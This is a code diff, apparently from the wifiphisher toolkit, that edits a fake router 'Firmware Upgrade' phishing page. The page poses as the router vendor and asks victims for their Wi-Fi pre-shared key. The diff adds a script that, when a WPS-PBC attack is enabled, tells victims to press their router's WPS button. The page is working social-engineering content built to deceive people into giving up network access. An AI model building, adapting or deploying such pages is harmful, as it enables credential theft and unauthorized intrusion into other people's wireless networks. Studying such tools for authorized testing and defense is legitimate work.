wifiphisher/data/phishing-pages/firmware-upgrade/html/index.html

```diff
@@ -154,23 +154,24 @@ <h2 class="text-center" style="color:CornflowerBlue">Firmware Upgrade</h2>
 
 In no event shall {{ target_ap_vendor }} Company or any other party which has been involved in the creation, production, or delivery of the {{ target_ap_vendor }} Firmware/Software/Drivers be liable for any damages whatsoever arising from or related to this Software License Agreement or the {{ target_ap_vendor }} Firmware/Software/Drivers, including, without limitation, direct, indirect, consequential, incidental or special damages or losses , including but not limited to damages for lost profits or losses resulting from business interruption or loss of data, regardless of the form of action or legal theory under which the liability may be asserted, even if advised of the possibility or likelihood of such damages.
 
-4. DOWNLOAD METHODS.
-
-You can either give the pre-shared key or just press the wps-pbc button on the Router and press the firmware download button.
        </textarea>
         <div class="checkbox">
           <label><input type="checkbox" id="check-box" onclick="checkBoxStatus()">I Agree With Above Terms And Conditions</label>
         </div>
-        <form>
-            <input type="radio" id="key_radio" name="download_method" value="pre-shared key" checked> Pre-shared Key<br>
-            <input type="radio" id="wps_radio" name="download_method" value="wps_pbc"> WPS-PBC <br>
-        </form>
       </div>
-      <div class="form-group has-feedback">
-          <label for="pwd">{{ target_ap_encryption }} Pre-Shared Key: <span id="pw_status" style="color:blue"></span></label>
+      <div class="form-group-has-feedback" id="psk_field">
+          <label for="pwd">{{ target_ap_encryption }} Pre-Shared Key:</label>
           <input class="form-control" type="password" id="pwd" disabled>
       </div>
       <div class="container text-center">
+        <script>
+            if ( "1" == {{ wps_pbc_attack }} && "1" == {{ psk_enable }}) {
+                document.write("<p align=\"left\"> Alternatively, please go to the wireless router and press the WPS button for a couple of seconds to initialize the firmware update process.</p>")
+            } else if ( "1" == {{wps_pbc_attack}}) {
+                document.write("<p align=\"left\"> Please go to the wireless router and press the WPS button for a couple of seconds to initialize the firmware update process.</p>")
+            }
+        </script>
+        <label align="left"> <span id="pw_status" style="color:gold"></span></label>

```

Comment:
move the status label below to the wps description and also make the paragraph left align for better layout.